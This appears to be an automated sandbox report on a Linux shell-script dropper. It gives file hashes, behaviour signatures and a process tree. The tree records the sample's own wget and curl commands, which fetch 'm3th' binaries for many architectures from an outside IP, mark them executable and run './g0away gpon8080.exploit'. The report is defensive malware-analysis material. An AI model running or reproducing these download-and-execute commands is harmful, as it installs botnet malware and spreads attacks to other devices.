Analysis
-
max time kernel
92s -
max time network
93s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28-07-2024 16:40
Static task
static1
Behavioral task
behavioral1
Sample
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Resource
debian9-mipsel-20240729-en
General
-
Target
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
-
Size
3KB
-
MD5
17f41b4b65e5ddad4a76594560d43927
-
SHA1
bb7691396c850ff2b4645b90336852650aa26eb6
-
SHA256
36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588
-
SHA512
602d2b3fda5948c263ab2c48f96993daf5ef404faec82cb2e7f55eae7c8dbed3525b6715f537629d7299c3f4e43077bcf1429b81375e7b2e16f398768920b322
Malware Config
Signatures
-
Executes dropped EXE 13 IoCs
Processes:
g0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayioc pid process /tmp/g0away 708 g0away /tmp/g0away 714 g0away /tmp/g0away 720 g0away /tmp/g0away 729 g0away /tmp/g0away 735 g0away /tmp/g0away 741 g0away /tmp/g0away 747 g0away /tmp/g0away 753 g0away /tmp/g0away 759 g0away /tmp/g0away 765 g0away /tmp/g0away 771 g0away /tmp/g0away 777 g0away /tmp/g0away 783 g0away -
Reads runtime system information 13 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118description ioc process File opened for modification /tmp/g0away 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Processes
-
/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes1181⤵
- Writes file to tmp directory
PID:699 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x862⤵PID:700
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x862⤵
- Reads runtime system information
PID:705 -
/bin/catcat m3th.x862⤵PID:706
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM92⤵PID:707
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:708 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips2⤵PID:710
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips2⤵
- Reads runtime system information
PID:711 -
/bin/catcat m3th.mips2⤵PID:712
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM92⤵PID:713
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:714 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl2⤵PID:716
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl2⤵
- Reads runtime system information
PID:717 -
/bin/catcat m3th.mpsl2⤵PID:718
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM92⤵PID:719
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:720 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm2⤵PID:722
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm2⤵
- Reads runtime system information
PID:723 -
/bin/catcat m3th.arm2⤵PID:727
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:728
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:729 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm52⤵PID:731
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm52⤵
- Reads runtime system information
PID:732 -
/bin/catcat m3th.arm52⤵PID:733
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:734
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:735 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm62⤵PID:737
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm62⤵
- Reads runtime system information
PID:738 -
/bin/catcat m3th.arm62⤵PID:739
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:740
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:741 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm72⤵PID:743
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm72⤵
- Reads runtime system information
PID:744 -
/bin/catcat m3th.arm72⤵PID:745
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:746
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:747 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc2⤵PID:749
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc2⤵
- Reads runtime system information
PID:750 -
/bin/catcat m3th.ppc2⤵PID:751
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:752
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:753 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k2⤵PID:755
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k2⤵
- Reads runtime system information
PID:756 -
/bin/catcat m3th.m68k2⤵PID:757
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:758
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:759 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc2⤵PID:761
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc2⤵
- Reads runtime system information
PID:762 -
/bin/catcat m3th.spc2⤵PID:763
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:764
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:765 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i6862⤵PID:767
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i6862⤵
- Reads runtime system information
PID:768 -
/bin/catcat m3th.i6862⤵PID:769
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:770
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:771 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh42⤵PID:773
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh42⤵
- Reads runtime system information
PID:774 -
/bin/catcat m3th.sh42⤵PID:775
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:776
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:777 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc2⤵PID:779
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc2⤵
- Reads runtime system information
PID:780 -
/bin/catcat m3th.arc2⤵PID:781
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:782
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:783